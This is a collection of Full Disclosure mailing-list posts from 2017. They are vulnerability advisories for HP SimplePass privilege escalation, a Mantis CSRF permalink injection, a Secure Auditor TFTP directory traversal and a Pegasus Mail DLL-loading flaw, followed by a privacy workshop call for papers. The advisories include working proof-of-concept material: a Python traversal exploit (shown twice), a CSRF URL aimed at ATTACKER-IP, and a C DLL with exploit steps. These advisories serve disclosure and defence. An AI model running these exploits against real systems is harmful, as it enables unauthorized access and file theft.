[FD] HP SimplePass Local Privilege Escalation
# Vulnerability Title: HP SimplePass Local Privilege Escalation # Advisory Release Date: 05/18/2017 # Credit: Discovered By Rehan Ahmed # Contact: knight_re...@hotmail.com # Severity Level: Medium # Type: Local # Tested Platform: Windows 8 & 10 x64 # Vendor: HP Inc. # Vendor Site: http://www.hp.com # Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe # Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46 # Vendor Contacted: 04/03/2017 # Vendor Response: 5/18/2017 Summary: HP SimplePass allows you to safely store logon information for your favorite websites, and use a single method of authentication for your password-protected website accounts. Choose a fingerprint, password or PIN to authenticate your identity. Your computer must have at least one password-protected Windows User Account to use HP SimplePass. https://support.hp.com/us-en/document/c03653209 # Issue Details: # HP SimplePass is prone to a local privilege-escalation vulnerability due to insecure file system permissions that have been granted during installation. Local adversary can exploit this issue to gain elevated privileges on affected system. HP SimplePass installs by default to "C:\Program Files\Hewlett-Packard\SimplePass" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. HP SimplePass has few binaries which are typically configured as a service or startup program which makes this particularly easy to take leverage. ## Proof of Concept ## a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass" C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F) Everyone:(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i "HP SimplePass" HP SimplePass Cachedrv Service Cachedrv server "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe" Auto HP SimplePass Service omniserv C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe Auto A user can place a malicious DLL/EXE (e.g OmniServ.exe) file with one of the expected names into that directory and wait until the service is restarted. The service can not be restarted by normal users but an attacker could just reboot the system or wait for the next reboot to happen. ### 3) Mitigation: ### Change the permission for dirctory to group other than Administrator on Read/Execute. Fix: https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2017-7620 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
www.mantisbt.org
Product:
=
Mantis Bug Tracker
1.3.10 / v2.3.0
MantisBT is a popular free web-based bug tracking system. It is written in
PHP works with MySQL, MS SQL, and PostgreSQL databases.
Vulnerability Type:
CSRF Permalink Injection
CVE Reference:
==
CVE-2017-7620
Security Issue:
Remote attackers can inject arbitrary permalinks into the mantisbt Web
Interface if an authenticated user visits a malicious webpage.
Vuln code in "string_api.php" PHP file, under mantis/core/ did not account
for supplied backslashes.
Line: 270
# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}
# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];
Exploit/POC:
=
http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP;
method="POST">
document.forms[0].submit()
OR
http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0;
method="POST">
document.forms[0].submit()
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
=
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
*** Added the product description... ***
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
www.secure-bytes.com
Product:
=
Secure Auditor - v3.0
Secure Auditor suite is a unified digital risk management solution for
conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
Vulnerability Type:
===
Directory Traversal
CVE Reference:
==
CVE-2017-9024
Security Issue:
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure
Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read
arbitrary files via ../ sequences in a pathname.
Exploit/POC:
=
import sys,socket
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01"#TFTP Read
PAYLOAD += FILE+"\x00" #Read system.ini using directory
traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
==
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
On Sat, May 20, 2017 at 12:14 AM, hyp3rlinx wrote:
> [+] Credits: John Page aka HYP3RLINX
> [+] Website: hyp3rlinx.altervista.org
> [+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-
> v3.0-DIRECTORY-TRAVERSAL.txt
> [+] ISR: ApparitionSec
>
>
>
> Vendor:
>
> www.secure-bytes.com
>
>
>
> Product:
> =
> Secure Auditor - v3.0
>
>
>
> Vulnerability Type:
> ===
> Directory Traversal
>
>
>
> CVE Reference:
> ==
> CVE-2017-9024
>
>
>
> Security Issue:
>
> Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes
> Secure Cisco Auditor (SCA) 3.0, has a
> Directory Traversal issue in its TFTP Server, allowing attackers to read
> arbitrary files via ../ sequences in a pathname.
>
>
>
>
> Exploit/POC:
> =
> import sys,socket
>
> print 'Secure Auditor v3.0 / Cisco Config Manager'
> print 'TFTP Directory Traversal Exploit'
> print 'Read ../../../../Windows/system.ini POC'
> print 'hyp3rlinx'
>
> HOST = raw_input("[IP]> ")
> FILE = '../../../../Windows/system.ini'
> PORT = 69
>
> PAYLOAD = "\x00\x01"#TFTP Read
> PAYLOAD += FILE+"\x00" #Read system.ini using directory
> traversal
> PAYLOAD += "netascii\x00" #TFTP Type
>
> s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
> s.sendto(PAYLOAD, (HOST, PORT))
> out = s.recv(1024)
> s.close()
>
> print "Victim Data located on : %s " %(HOST)
> print out.strip()
>
>
>
> Network Access:
> ===
> Remote
>
>
>
>
> Severity:
> =
> High
>
>
>
> Disclosure Timeline:
> ==
> Vendor Notification: May 10, 2017
> No replies
> May 20, 2017 : Public Disclosure
>
>
>
> [+] Disclaimer
> The information contained within this advisory is supplied "as-is" with no
> warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and
> that due credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit
> is given to the author. The author is not responsible for any misuse of
> the information contained herein and accepts no responsibility
> for any damage caused by the use or misuse of this information. The author
> prohibits any malicious use of security related information
> or exploits by the author or elsewhere. All
[FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
www.secure-bytes.com
Product:
=
Secure Auditor - v3.0
Vulnerability Type:
===
Directory Traversal
CVE Reference:
==
CVE-2017-9024
Security Issue:
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure
Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read
arbitrary files via ../ sequences in a pathname.
Exploit/POC:
=
import sys,socket
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01"#TFTP Read
PAYLOAD += FILE+"\x00" #Read system.ini using directory
traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
==
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=
www.pmail.com
Product:
===
Pegasus "winpm-32.exe"
v4.72 build 572
Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail
client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served
millions of users since it was released in 1990.
Vulnerability Type:
==
Remote Code Execution
CVE Reference:
==
CVE-2017-9046
Security Issue:
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by
clicking an HTML "mailto:; link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested
successfully using Internet Explorer Web Browser.
e.g.
mailto:n...@victim.com;>Link text
Place "ssgp.dll" on the desktop then visit the webpage in "Internet
Explorer", click the mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.
User needs to have setup PMAIL with "mailto:; link option on install.
Exploit:
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL
with "mailto:; link option on install.
2) Compile "ssgp.dll" as DLL using below 'C' code.
#include
//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
break;
}
return 0;
}
3) Place "ssgp.dll" on Desktop
4) Create an HTML file with following in the web server root directory.
mailto:n...@victim.com;>Pegasus Exploit POC
5) Open webpage in InternetExplorer Web Browser and click malicious mailto:
link.
Our code gets executed...
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CFP - WPES - 2017 Workshop on Privacy in the Electronic Society
CALL FOR PAPERS === ** 2017 Workshop on Privacy in the Electronic Society (WPES 2017) Dallas, Texas, USA - October 30, 2017 https://cs.pitt.edu/wpes2017 ** The need for privacy-aware policies, regulations, and techniques has been widely recognized. This workshop discusses the problems of privacy in the global interconnected societies and possible solutions. The 2017 Workshop, held in conjunction with the ACM CCS conference, is the sixteenth in a yearly forum for papers on all the different aspects of privacy in today's electronic society. The workshop seeks submissions from academia and industry presenting novel research on all theoretical and practical aspects of electronic privacy, as well as experimental studies of fielded systems. We encourage submissions from other communities such as law and business that present these communities' perspectives on technological issues. Topics of interest include, but are not limited to: - anonymization and trasparency - crowdsourcing for privacy and security - data correlation and leakage attacks - data security and privacy - data and computations integrity in emerging scenarios - electronic communication privacy - economics of privacy - information dissemination control - models, languages, and techniques for big data protection - personally identifiable information - privacy-aware access control - privacy and anonymity on the web - privacy in biometric systems - privacy in cloud and grid systems - privacy and confidentiality management - privacy and data mining - privacy in the Internet of Things - privacy in the digital business - privacy in the electronic records - privacy enhancing technologies - privacy and human rights - privacy in health care and public administration - privacy metrics - privacy in mobile systems - privacy in outsourced scenarios - privacy policies - privacy vs. security - privacy of provenance data - privacy in social networks - privacy threats - privacy and virtual identity - user profiling - wireless privacy PAPER SUBMISSIONS - Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal or a conference with proceedings. Regular submissions should be at most 10 pages in the ACM double-column format (http://www.acm.org/sigs/publications/proceedings-templates) including bibliography, but excluding well-marked appendices, and at most 12 pages total. Committee members are not required to read the appendices, and so the paper should be intelligible without them. Submissions should not be anonymized. The workshop will also consider short submissions of up to 4 pages for results that are preliminary or that simply require few pages to describe. Authors of regular submitted papers will indicate at the time of submission whether they would like their paper to also be considered for publication as a short paper (4 proceedings pages). Submissions are to be made to the submission web site at https://easychair.org/conferences/?conf=wpes2017. You will be requested to upload the file of your paper (in PDF format only). Submissions not meeting these guidelines risk rejection without consideration of their merits. Papers must be received by the deadline of **August 4, 2016** to be considered. Notification of acceptance or rejection will be sent to authors by September 8, 2017. The camera ready must be prepared by September 17, 2017 (firm). Proceedings of the workshop will be published by ACM on a CD, available to the workshop attendees. Papers will be included in the ACM Digital Library, with a specific ISBN. Each accepted paper must be presented by an author, who will have to be registered by the early-bird registration deadline. IMPORTANT DATES --- Paper Submission due: August 4, 2017 (11:59 PM American Samoa Time) Notification to authors: September 8, 2017 (11:59 PM American Samoa Time) Camera ready due: September 17, 2017 PROGRAM CHAIR - Adam J. Lee University of Pittsburgh, USA PUBLICITY CHAIR --- William C. Garrison III University of Pittsburgh, USA PROGRAM COMMITTEE - TBD STEERING COMMITTEE -- Sabrina De Capitani di Vimercati, Università degli Studi di Milano, Italy Sushil Jajodia, George Mason University, USA Pierangela Samarati (Chair), Università degli Studi di Milano, Italy Paul Syverson, Naval Research Laboratory, USA Submissions are to be made at: https://easychair.org/conferences/?conf=wpes2017 This call for papers and additional information about the conference can be found at https://cs.pitt.edu/wpes2017 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
